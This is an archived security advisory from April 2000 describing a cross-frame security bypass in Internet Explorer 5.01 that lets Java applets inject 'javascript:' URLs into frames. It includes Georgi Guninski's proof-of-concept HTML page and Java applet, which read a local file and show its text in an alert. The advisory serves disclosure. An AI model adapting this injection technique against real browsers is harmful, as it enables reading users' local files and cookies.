IE 5 Allows Cross-frame Navigation
Reported April 18, 2000 by
Georgi Guninski
VERSIONS EFFECTED
  • Internet Explorer 5.01 (only tested on Win98, however other platforms may be affected)

DESCRIPTION

Internet Explorer 5.01 (IE5) allows the circumvention of its cross-frame security policy by accessing the DOM of documents using Java or JavaScript.

The problem exposes the whole DOM of the target document and according to Georgi, opens lots of additional security risks. The problem allows reading local files, reading files from any host, window spoofing, retrieving cookies, and more.

According to Georgi"s report, "this is not a bug in the Java language but a bug in Microsoft"s implementation of Java witin IE. Normally, IE 5.x does not allow assigning "javascript:" urls to the location object because this is dangerous. But this may be circumvented with the help of the interaction between Java and the DOM/JavaScript. The Java JSObject allows setting DOM properties from Java and allows setting a hostile javascript url to the IFRAME"s location. This leads to circumventing cross-frame security policy."

Georgi adds that if you disable Active Scripting but have Java and Scripting of Java applets both enabled, then Active Scripting may still execute in the browser. The problem seems to be the fact that IE always executes Active Scripting in "My Computer" zone and with Java one may inject javascript:URLs into IFRAMEs within "My Computer" zone. So to really disable Active Scripting you must not only disable Active Scripting but also disable Java and/or Scripting of Java applets.


DEMONSTRATION

Georgi"s code is as follows:

------jsinject.html--------------------------------
<IFRAME ID="I1" NAME="I1" SRC="file://c:/test.txt"></IFRAME>
<applet MAYSCRIPT code="jsinject">
<param name="jscode" value="javascript:alert(document.body.innerText)">
</applet>
<A HREF="javascript:document.applets\[0\].doit()">Read the file</A>
---------------------------------------------------

------jsinject.java--------------------------------
import java.applet.Applet;
import netscape.javascript.*;

public class jsinject extends Applet \{

public void doit()
\{
try
\{
JSObject win = (JSObject) JSObject.getWindow(this);
JSObject doc = (JSObject) win.getMember("document");
JSObject I1 = (JSObject) doc.getMember("I1");
JSObject loc = (JSObject) I1.getMember("location");
loc.setMember("href",getParameter("jscode"));
\}
catch(Exception x)\{System.out.println(x.toString());\}
\}
\}
---------------------------------------------------

VENDOR RESPONSE

No response was known from Microsoft at the time of this writing. We will update this bulletin upon their response.

CREDITS
Discovered and reported by
Geogi Guninski